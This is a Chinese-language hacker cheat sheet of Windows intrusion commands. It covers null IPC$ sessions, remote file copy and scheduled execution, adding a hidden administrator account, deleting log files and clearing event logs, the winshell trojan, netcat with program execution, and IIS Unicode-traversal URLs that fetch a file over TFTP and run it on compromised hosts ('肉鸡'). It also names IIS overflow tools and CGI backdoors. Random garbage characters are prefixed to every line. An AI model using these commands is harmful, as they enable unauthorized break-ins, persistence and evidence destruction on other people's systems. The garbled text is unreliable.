网管和黑客都必须知道的命令
lMg#zT��!? 常用的几条NET命令:
P�&:�[pPG� =^{��MyR7 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
DNqC*IvuzM p��__N�6�a (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
F�)��imeu� {
JDD"z�� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
H~Uy/22aQy \K�%M.>]vq (查看远程主机时间) net time \\IP地址
����1L7^g* �y[�A�B,Dd (定时启动某个程序) at \\IP地址 02:18 readme.exe
6�<5:m:KE� ln�,��9��v (查看共享) net view \\IP地址
X+,0;�%� p �G7-�k ,P^ (查看netbios工作组列表) nbtstat -A IP地址
,BG�UIu�6 PVljb�=8F� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�8�)"lCIf W|���0))5a (这两条把自己增加到管理员组): net user 用户名 密码 /add
2cGi���E{� �G�Gh�k�`z net localgroup Administrators 用户名 /add
�S��^EAE] rb'm�Fqg*u (断开连接) net use \\IP地址\ipc$ /delete
eq&Q�WxiD* @}{u�ibLD\ 扫尾:
W�|n$H`;R �Z�8Vof�~� del C:\winnt\system32\logfiles\*.*
yUxz,�36wZ �Q^@7Yg@l del C:\winnt\ssytem32\config\*.evt
N��@!�PhP� �aiE\r/k8s del C:\winnt\system32\dtclog\*.*
�<X& fs*x& vMJ(L�l7�/ del C:\winnt\system32\*.log
�GM)q\H�x{ �5�U]@
Y?� del C:\winnt\system32\*.txt
�6z�N�WDUf Y�"s8j=�1m del C:\winnt\*.txt
P�q(�LW(�� �T
7qH�w!) del C:\winnt\*.log
gLZJQubz
6 an�f��nqa8 一、netsvc.exe
#&L7FBJ"*v 4ZR2U3jd1� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
3=�Rk(%:;� 5e�7\tB�ab netsvc /list \\IP地址
Q%J,�:��J� S�}]��B�|Q netsvc schedule \\IP地址 /query
^\J-LU|�"B GY0OVAW6'c netsvc \\IP地址 schedule /start
9zCuVUcd$. �1�����Qz@ 二、OpenTelnet.exe
m�V4gw'.;7 � P�7/Xh3� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
T�:|p[�Xbo E�:PPb9Kd OpenTelnet \\IP地址 用户名 密码 1 7878
S0r+Y�0J]< g:�G�5'pZf 然后就可以telnet到主机的7878端口,进入DOS方式下:
e:.�?�T�\� pm:-�E(3#� telnet IP地址 7878
v�?Cakwu kDM?�`(�r� 三、winshell.exe
�D�vOv�t�d ]g��ae�N2� 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
H�Pt�\ �BK d'3"A"9R7- p Path (查看winshell主程序的路径信息)
b�s16G3-�p '�Yc^9;C(� b reBoot (重新启动机器)
��Z�*h}E�� fZ;}�_wR-H d shutDown (关闭机器)
G8/q&6f�_� ��\$s����s s Shell (执行后你就会看到可爱的“C:\>”)
�8_S| 8RW( �C|3c���Q{ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
ZBN,%�P!P0 +�Kg }R5�+ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
KMQP��A>w# e�L}�X�(). 四、3389登陆器,GUI方式登录远程主机的
`P*B�W,P'T BS?$eai@:9 五、elsave.exe
bz�~aj�}"` [�cl+AV "� 事件日志清除工具
2cRru]V�Z5 )N�1iGJO�) elsave -s \\IP地址 -l "application" -C
v��'^}z��O 5IFzbL#q#f elsave -s \\IP地址 -l "system" -C
+/]�*ChrS� �}#g+~9UK� elsave -s \\IP地址 -l "security" -C
~�
L>M-D4o �h%4UeL &F 执行后成功清除应用程序日志,系统日志,安全日志
�PDC��b(�5 Z��e#D�Fe$ 六、hbulot.exe
7�-}�5
�W EIyF�GCw|U 开启win2kserver和winxp的3389服务
�u�Z>q$
�F ~%�f$�}{�� hbulot [/r]
k#��8`996P �bw7�g�L\* 使用/r表示安装完成后自动重起目标使设置生效。
�d&f!\n_~ 3?L[ohKH?: 七、nc.exe(netcat.exe)
r
)��_*MPY >+I�ph2] 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
nLv~)IQ}:� Fpeokr"�i� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�cx�&\�oP� �n�4�}e!�
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
twbxi{8e. z�5Tsu�1�c 参数:
t+]�1D@h�v H=g%>W�%�3 -e prog 程序重定向,一旦连接,就执行 [危险!!]
�b0f6p>~q^ ��C�8�|#�� -g gateway source-routing hop point[s], up to 8
{~s\a2Y��H I;e�o�y, -G num source-routing pointer: 4, 8, 12, ...
�eO*s�,*�� ;$gV$KB:xA -h 帮助信息
�|_-w�{�2K �)& Ox�p&x -i secs 延时的间隔
Fa�v++���z ��IA[:-�2_ -l 监听模式,用于入站连接
S �$o1�Q��
&�1&OX�m$ -n 指定数字的IP地址,不能用hostname
M���V!�d*\ ;FF+�u��K -o file 记录16进制的传输
�dga4|7-MY BGwD{6�`�U -p port 本地端口号
l�"D�HG`kb ?��TK`s�Gy -r 任意指定本地及远程端口
X!�'�C'3�X {&B_b|g*fW -s addr 本地源地址
)|k#cT{�=M op9v�z[o#4 -u UDP模式
OJJ �[E�r1 �w%\{4T��~ -v 详细输出——用两个-v可得到更详细的内容
kS9;Tj��cx �F�u�5Y<*x -w secs timeout的时间
T�]zD+/�=� Y �Q��.Xl_ -z 将输入输出关掉——用于扫描时
�uozq�^�sy 八、TFTPD32.EXE
�7D�oU7I\u pP�o(�nH|< 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
?_A�[E]/H �d!Gy#<�H� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
]�7�yx�Xg z\"
.�(fIV 然后可以直接令文件运行:
t�Y!l}:�E[ ud�B�IEW,` http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
N}ND�()bf� S4�{vS?>j� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
.s!0S-Rk�C Bmcc�SC;o4 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
m6$&yKQ-=h w\eC�{,00: 一、一 Xscan命令行运行参数说明:
/�4c��`[� �4Y2�I'~'� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
^H��1�m8�= -�o`K/f}d 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
Q�J�rXn6` rwP)T�Jh" xscan -file <主机列表文件名> <检测项目> [其他选项]
�% -A��cA 1IS�1P)4_0 其中<检测项目> 含义如下:
?b{y#�du2a f5b|�,�JJ� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
3!fR'L�/�i �&0%Z�b~ts -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
F��� --b,, j�%-Ems*H� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
\ERx�r
�� F8{gJaP� x -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
]sL.+�.P�� Y�;h��uTZ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
t�!�6u�z�� Ka-o$o[^u` [其他选项] 含义如下:
Je��hanF[� F~
�\ONO5� -v: 显示详细扫描进度
�hif;atO�� YlGUd~$`"+ -p: 跳过Ping不通的主机
o�rt�*Ux)
Csyc�R��@[ -o: 跳过没有检测到开放端口的主机
?YZg��H>7" ��q0�Q[]|L -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
